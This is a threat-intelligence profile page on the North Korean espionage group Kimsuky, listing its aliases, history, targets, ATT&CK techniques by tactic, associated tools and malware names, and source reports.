← threatfilter.dev / all groups / Kimsuky
Kimsuky
Also known as: Black Banshee · Velvet Chollima · Emerald Sleet · THALLIUM · APT43 · TA427 · Springtail · Earth Kumiho · PatheticSlug
Overview
Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing. Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance. DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group, rather than tracking operationally distinct subgroups.
Targets
Defense · Diplomacy · Education · Energy · Government · Media · Private sector · Research - Innovation
Regions
Germany · Korea Institute for Defense Analyses · Ministry of Unification · Sejong Institute
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
- Custom malware/implant development — ATT&CK: 13 attributed custom malware families
TTPs — 130 techniques across 15 tactics
Reconnaissance
-
T1589.002Email Addresses -
T1589.003Employee Names -
T1591Gather Victim Org Information -
T1593.001Social Media -
T1593.002Search Engines -
T1594Search Victim-Owned Websites -
T1596Search Open Technical Databases -
T1598Phishing for Information -
T1598.003Spearphishing Link -
T1682Query Public AI Services
Resource Development
-
T1583Acquire Infrastructure -
T1583.001Domains -
T1583.004Server -
T1583.006Web Services -
T1584.001Domains -
T1585Establish Accounts -
T1585.001Social Media Accounts -
T1585.002Email Accounts -
T1586.002Email Accounts -
T1587Develop Capabilities -
T1587.001Malware -
T1588.002Tool -
T1588.003Code Signing Certificates -
T1588.005Exploits -
T1608.001Upload Malware
Initial Access
-
T1190Exploit Public-Facing Application -
T1566Phishing -
T1566.001Spearphishing Attachment -
T1566.002Spearphishing Link
Execution
-
T1053.005Scheduled Task -
T1059.001PowerShell -
T1059.003Windows Command Shell -
T1059.005Visual Basic -
T1059.006Python -
T1059.007JavaScript -
T1106Native API -
T1204.001Malicious Link -
T1204.002Malicious File -
T1204.004Malicious Copy and Paste -
T1559.001Component Object Model
Persistence
-
T1098.007Additional Local or Domain Groups -
T1133External Remote Services -
T1136.001Local Account -
T1176.001Browser Extensions -
T1505.003Web Shell -
T1543.003Windows Service -
T1547.001Registry Run Keys / Startup Folder
Privilege Escalation
-
T1546.001Change Default File Association
Stealth
-
T1027Obfuscated Files or Information -
T1027.001Binary Padding -
T1027.002Software Packing -
T1027.007Dynamic API Resolution -
T1027.010Command Obfuscation -
T1027.012LNK Icon Smuggling -
T1027.013Encrypted/Encoded File -
T1027.015Compression -
T1027.016Junk Code Insertion -
T1036.004Masquerade Task or Service -
T1036.005Match Legitimate Resource Name or Location -
T1036.007Double File Extension -
T1055Process Injection -
T1055.001Dynamic-link Library Injection -
T1055.012Process Hollowing -
T1070.004File Deletion -
T1070.006Timestomp -
T1078.003Local Accounts -
T1140Deobfuscate/Decode Files or Information -
T1205Traffic Signaling -
T1218.005Mshta -
T1218.010Regsvr32 -
T1218.011Rundll32 -
T1480.002Mutual Exclusion -
T1497.001System Checks -
T1564.002Hidden Users -
T1564.003Hidden Window -
T1564.011Ignore Process Interrupts -
T1620Reflective Code Loading -
T1678Delay Execution -
T1684.001Impersonation
Defense Impairment
-
T1112Modify Registry -
T1553.002Code Signing -
T1685Disable or Modify Tools -
T1686Disable or Modify System Firewall
Credential Access
-
T1003.001LSASS Memory -
T1040Network Sniffing -
T1111Multi-Factor Authentication Interception -
T1539Steal Web Session Cookie -
T1552.001Credentials In Files -
T1552.004Private Keys -
T1555.003Credentials from Web Browsers -
T1557Adversary-in-the-Middle
Discovery
-
T1007System Service Discovery -
T1012Query Registry -
T1016System Network Configuration Discovery -
T1033System Owner/User Discovery -
T1057Process Discovery -
T1082System Information Discovery -
T1083File and Directory Discovery -
T1124System Time Discovery -
T1217Browser Information Discovery -
T1518.001Security Software Discovery -
T1680Local Storage Discovery
Lateral Movement
-
T1021.001Remote Desktop Protocol -
T1534Internal Spearphishing -
T1550.002Pass the Hash
Collection
-
T1005Data from Local System -
T1056.001Keylogging -
T1056.003Web Portal Capture -
T1074.001Local Data Staging -
T1113Screen Capture -
T1114.002Remote Email Collection -
T1114.003Email Forwarding Rule -
T1115Clipboard Data -
T1185Browser Session Hijacking -
T1560.001Archive via Utility -
T1560.003Archive via Custom Method
Command and Control
-
T1071.001Web Protocols -
T1071.002File Transfer Protocols -
T1071.003Mail Protocols -
T1102.001Dead Drop Resolver -
T1102.002Bidirectional Communication -
T1105Ingress Tool Transfer -
T1132.002Non-Standard Encoding -
T1219.002Remote Desktop Software -
T1568Dynamic Resolution
Exfiltration
-
T1020Automated Exfiltration -
T1041Exfiltration Over C2 Channel -
T1567.002Exfiltration to Cloud Storage
Impact
-
T1489Service Stop -
T1657Financial Theft
Tools & malware (19)
Troll Stealer · HTTPTroy · schtasks · certutil · Amadey · GoBear · Brave Prince · CSPY Downloader · gh0st RAT · AppleSeed · Gomir · NOKKI · QuasarRAT · Gold Dragon · PsExec · KGH_SPY · Mimikatz · BabyShark · TRANSLATEXT
Reporting (3)
- 2026 GLOBAL THREAT LANDSCAPE REPORT: Decoding the Accelerated Cyber Attack Cycle — Rapid7
- Introducing the 2026 Cloudflare Threat Report — Cloudflare
- Springtail: New Linux Backdoor Added to Toolkit — Symantec Threat Hunter Team